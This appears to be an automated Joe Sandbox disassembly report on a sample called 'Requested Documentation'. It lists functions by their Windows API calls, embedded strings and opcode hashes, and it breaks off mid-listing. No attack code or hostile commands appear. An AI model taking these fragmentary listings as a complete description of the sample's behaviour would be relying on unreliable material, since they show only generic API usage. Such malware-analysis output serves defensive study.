                                                                              • API ID: ColorLongWindow
                                                                              • String ID:
                                                                              • API String ID: 259745315-0
                                                                              • Opcode ID: e41753cfab9ff26c82ea94c0d0f6b8a665645193255ff9e9d9668cff02205198
                                                                              • Instruction ID: 301c19988298c4dd96411e19ce681e96291cdb7986c0b0b872e64e3594c02ff3
                                                                              • Opcode Fuzzy Hash: e41753cfab9ff26c82ea94c0d0f6b8a665645193255ff9e9d9668cff02205198
                                                                              • Instruction Fuzzy Hash: 50417F31000544EFDB29AF68DC88BB93B69EB46331F244365FE659A2E2C7718C42DB61
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?,00A0F910), ref: 009EA90B
                                                                              • GetDriveTypeW.KERNEL32(00000061,00A389A0,00000061), ref: 009EA9D5
                                                                              • _wcscpy.LIBCMT ref: 009EA9FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                              • API String ID: 2820617543-1000479233
                                                                              • Opcode ID: f769168a3910099eea28d241199a49b77f47b0d810d22c245067af006bbe498c
                                                                              • Instruction ID: d0f82f327c4f5dd2125362d8ca01693202a77c67083f515e4109af33a174320e
                                                                              • Opcode Fuzzy Hash: f769168a3910099eea28d241199a49b77f47b0d810d22c245067af006bbe498c
                                                                              • Instruction Fuzzy Hash: 10517631108341ABC711EF15C892BAEBBA9AFC5344F55482DF496972A2DB31ED09CB93
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __i64tow__itow__swprintf
                                                                              • String ID: %.15g$0x%p$False$True
                                                                              • API String ID: 421087845-2263619337
                                                                              • Opcode ID: 8d3833df0cf1830bde6c4eecb0d1527d4ac797ea1a6cb77abcf88f09153952f4
                                                                              • Instruction ID: 934aac39711c72486c5569c4dfda991618fa9abc820fde4b6064f54214cf8d45
                                                                              • Opcode Fuzzy Hash: 8d3833df0cf1830bde6c4eecb0d1527d4ac797ea1a6cb77abcf88f09153952f4
                                                                              • Instruction Fuzzy Hash: 3C41F571500206AFDB24EF34CD46BB6B3E8FF86310F24486EF449DA292EA7599418B50
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00A0716A
                                                                              • CreateMenu.USER32 ref: 00A07185
                                                                              • SetMenu.USER32(?,00000000), ref: 00A07194
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A07221
                                                                              • IsMenu.USER32(?), ref: 00A07237
                                                                              • CreatePopupMenu.USER32 ref: 00A07241
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A0726E
                                                                              • DrawMenuBar.USER32 ref: 00A07276
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                              • String ID: 0$F
                                                                              • API String ID: 176399719-3044882817
                                                                              • Opcode ID: 9176e27f53ff5388d36ac25d6bb08d4cb39b88a42c2501a1c3f3bbbe14997d63
                                                                              • Instruction ID: 65fdd0bc888a830ca94d55983e469ad75c78472534a6ea4c8a90433aa46d0dad
                                                                              • Opcode Fuzzy Hash: 9176e27f53ff5388d36ac25d6bb08d4cb39b88a42c2501a1c3f3bbbe14997d63
                                                                              • Instruction Fuzzy Hash: D8414979A01209EFDB20DFA4E984EDA7BB5FF49310F144129F945A73A1D731A911CF90
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A0755E
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00A07565
                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A07578
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A07580
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A0758B
                                                                              • DeleteDC.GDI32(00000000), ref: 00A07594
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00A0759E
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A075B2
                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A075BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                              • String ID: static
                                                                              • API String ID: 2559357485-2160076837
                                                                              • Opcode ID: c385680df884a36e057e339d369e88fd98adbebcf3a7005f5ce1b7389820e154
                                                                              • Instruction ID: 4c4722e412625b1fa9cb9ae4ab4bd58cfa22d3cbf60c6ab27dea48112a0ebc98
                                                                              • Opcode Fuzzy Hash: c385680df884a36e057e339d369e88fd98adbebcf3a7005f5ce1b7389820e154
                                                                              • Instruction Fuzzy Hash: 25316D72504219BFDF229FA4EC09FDA3B69FF09760F114224FA15A61E0D731E812DBA4
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009A6E3E
                                                                                • Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28
                                                                              • __gmtime64_s.LIBCMT ref: 009A6ED7
                                                                              • __gmtime64_s.LIBCMT ref: 009A6F0D
                                                                              • __gmtime64_s.LIBCMT ref: 009A6F2A
                                                                              • __allrem.LIBCMT ref: 009A6F80
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A6F9C
                                                                              • __allrem.LIBCMT ref: 009A6FB3
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A6FD1
                                                                              • __allrem.LIBCMT ref: 009A6FE8
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A7006
                                                                              • __invoke_watson.LIBCMT ref: 009A7077
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                              • String ID:
                                                                              • API String ID: 384356119-0
                                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                              • Instruction ID: 39bf5623de90c16420dcc8122a19516c5aaf606b747b3057e9fd6a89dabfd7bb
                                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                              • Instruction Fuzzy Hash: 5D71F876A00B17ABD714EF78DC42B9AB7A8AF46724F248629F514E72C1E770DD108BD0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E2542
                                                                              • GetMenuItemInfoW.USER32(00A45890,000000FF,00000000,00000030), ref: 009E25A3
                                                                              • SetMenuItemInfoW.USER32(00A45890,00000004,00000000,00000030), ref: 009E25D9
                                                                              • Sleep.KERNEL32(000001F4), ref: 009E25EB
                                                                              • GetMenuItemCount.USER32(?), ref: 009E262F
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 009E264B
                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 009E2675
                                                                              • GetMenuItemID.USER32(?,?), ref: 009E26BA
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009E2700
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2714
                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2735
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                              • String ID:
                                                                              • API String ID: 4176008265-0
                                                                              • Opcode ID: 2cd329b04456d90a3b5fb755c6fc01deed286bede1509e79c8b6b15140df988b
                                                                              • Instruction ID: 814d6382a6f9522af7dcea26a7fadd7e96344f1587164120f3b8b6635a979953
                                                                              • Opcode Fuzzy Hash: 2cd329b04456d90a3b5fb755c6fc01deed286bede1509e79c8b6b15140df988b
                                                                              • Instruction Fuzzy Hash: 5561807490028DAFDB22CFA5CD88EAE7BBCFB45304F14056AE841A7251D772AD06DB21
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A06FA5
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A06FA8
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A06FCC
                                                                              • _memset.LIBCMT ref: 00A06FDD
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A06FEF
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A07067
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: 2a0c84c3b883a55b40fa8c7137cd5e22ef8860091bb1c99330e2b0e8150f48dd
                                                                              • Instruction ID: 3a471f0dc772f58ebe13507f70887a4e740569f24933ae40b88580d03c0844d9
                                                                              • Opcode Fuzzy Hash: 2a0c84c3b883a55b40fa8c7137cd5e22ef8860091bb1c99330e2b0e8150f48dd
                                                                              • Instruction Fuzzy Hash: 3A617A75900208AFDB11DFA4DD81EEE77F8EB49710F104169FA14AB2E2C771AD52DBA0
                                                                              APIs
                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009D6BBF
                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 009D6C18
                                                                              • VariantInit.OLEAUT32(?), ref: 009D6C2A
                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 009D6C4A
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 009D6C9D
                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 009D6CB1
                                                                              • VariantClear.OLEAUT32(?), ref: 009D6CC6
                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 009D6CD3
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009D6CDC
                                                                              • VariantClear.OLEAUT32(?), ref: 009D6CEE
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009D6CF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                              • String ID:
                                                                              • API String ID: 2706829360-0
                                                                              • Opcode ID: e5244649c5841ca2e56916eeefe62bdae8ea963c2a9f5bbcfb2bee84c6812065
                                                                              • Instruction ID: 0fd6f476d1b6cc256b9aa3e059111772c897c6f49d52a7d26caa1c01140a51f0
                                                                              • Opcode Fuzzy Hash: e5244649c5841ca2e56916eeefe62bdae8ea963c2a9f5bbcfb2bee84c6812065
                                                                              • Instruction Fuzzy Hash: 94414F75A4021D9FCF10DFA8D8849AEBBB9EF48354F00C06AE955E7361CB31A946CF90
                                                                              APIs
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • CoInitialize.OLE32 ref: 009F8403
                                                                              • CoUninitialize.OLE32 ref: 009F840E
                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00A12BEC,?), ref: 009F846E
                                                                              • IIDFromString.OLE32(?,?), ref: 009F84E1
                                                                              • VariantInit.OLEAUT32(?), ref: 009F857B
                                                                              • VariantClear.OLEAUT32(?), ref: 009F85DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                              • API String ID: 834269672-1287834457
                                                                              • Opcode ID: 626e16562678d236bfca5ceb1c4244714022e5ec0209e74a3cdf0a4bfc53271d
                                                                              • Instruction ID: a56b9fae0d509f31a0ab463794ddcad26215fd51f45fad313b8dc9b994671df8
                                                                              • Opcode Fuzzy Hash: 626e16562678d236bfca5ceb1c4244714022e5ec0209e74a3cdf0a4bfc53271d
                                                                              • Instruction Fuzzy Hash: 5161CF7060831AAFC750DF64C848F6FB7E8AF85754F044859FA819B2A1CB74ED49CB92
                                                                              APIs
                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 009F5793
                                                                              • inet_addr.WSOCK32(?,?,?), ref: 009F57D8
                                                                              • gethostbyname.WSOCK32(?), ref: 009F57E4
                                                                              • IcmpCreateFile.IPHLPAPI ref: 009F57F2
                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009F5862
                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009F5878
                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009F58ED
                                                                              • WSACleanup.WSOCK32 ref: 009F58F3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                              • String ID: Ping
                                                                              • API String ID: 1028309954-2246546115
                                                                              • Opcode ID: a8d7fa2dae45e1e8f4089a4ee68fb3a9fcae185d22a41352ac36d14b992cbe92
                                                                              • Instruction ID: 85c728a162b2bd46f6d3b32399fa0a2a3f633685cadf513fb80ebf6174432e9e
                                                                              • Opcode Fuzzy Hash: a8d7fa2dae45e1e8f4089a4ee68fb3a9fcae185d22a41352ac36d14b992cbe92
                                                                              • Instruction Fuzzy Hash: AE519E31600704DFDB20EF64DC45B3A77E4AF88750F058929FA56EB2A1DB30E805CB42
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 009EB4D0
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009EB546
                                                                              • GetLastError.KERNEL32 ref: 009EB550
                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 009EB5BD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: fe51085506c79832a036e035dbee313d4892e8242e69387da08f0647e6b6d0b5
                                                                              • Instruction ID: 1e7f4a6219ec644030dfcfe311b77fc28c74985836806ad211db7c29b4101575
                                                                              • Opcode Fuzzy Hash: fe51085506c79832a036e035dbee313d4892e8242e69387da08f0647e6b6d0b5
                                                                              • Instruction Fuzzy Hash: 40319C35A00249AFCB11EFA9C885ABEBBB8FF48310F144526F505A7291DF759E42CB81
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009D9014
                                                                              • GetDlgCtrlID.USER32 ref: 009D901F
                                                                              • GetParent.USER32 ref: 009D903B
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 009D903E
                                                                              • GetDlgCtrlID.USER32(?), ref: 009D9047
                                                                              • GetParent.USER32(?), ref: 009D9063
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 009D9066
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1536045017-1403004172
                                                                              • Opcode ID: 95426019835b6936d5e218234bf1c8c0a755ebbb8447f9fc555836e91751a551
                                                                              • Instruction ID: dee751ca59e211b78560518223b5884af4614340ce695b6f242cbef42f3ffdad
                                                                              • Opcode Fuzzy Hash: 95426019835b6936d5e218234bf1c8c0a755ebbb8447f9fc555836e91751a551
                                                                              • Instruction Fuzzy Hash: 5B21B274A40108BFDF14EBA0CC85EBEBB79EF85310F504216B921972A1DB76981ADB20
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009D90FD
                                                                              • GetDlgCtrlID.USER32 ref: 009D9108
                                                                              • GetParent.USER32 ref: 009D9124
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 009D9127
                                                                              • GetDlgCtrlID.USER32(?), ref: 009D9130
                                                                              • GetParent.USER32(?), ref: 009D914C
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 009D914F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1536045017-1403004172
                                                                              • Opcode ID: 7e1e2e134ddf090d59030ba787eacac5e39c7de7b47aff3c1c4c663a73f14acf
                                                                              • Instruction ID: 84e50d4525712f3843ae15da6b4fd5b594b73a448de7b98c35b5400048613ff8
                                                                              • Opcode Fuzzy Hash: 7e1e2e134ddf090d59030ba787eacac5e39c7de7b47aff3c1c4c663a73f14acf
                                                                              • Instruction Fuzzy Hash: 1921B074A40108BBDF10ABA0CC85BFEBB78EB48300F504116B911A73A1DB76881ADB20
                                                                              APIs
                                                                              • GetParent.USER32 ref: 009D916F
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 009D9184
                                                                              • _wcscmp.LIBCMT ref: 009D9196
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009D9211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 1704125052-3381328864
                                                                              • Opcode ID: f8d2840677042fa3bc0f2c5d9fbb63e9d2424232f2778fd0ea890d3b5f168ff0
                                                                              • Instruction ID: 805935b55f396de7cab4f5e7af98203980ea2d6c6853375e522af6e834c4c250
                                                                              • Opcode Fuzzy Hash: f8d2840677042fa3bc0f2c5d9fbb63e9d2424232f2778fd0ea890d3b5f168ff0
                                                                              • Instruction Fuzzy Hash: C9110A762CC30BB9FA213728DC06EA7379CAB16720F204527FA14F55D1EE61A8525594
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 009F88D7
                                                                              • CoInitialize.OLE32(00000000), ref: 009F8904
                                                                              • CoUninitialize.OLE32 ref: 009F890E
                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 009F8A0E
                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 009F8B3B
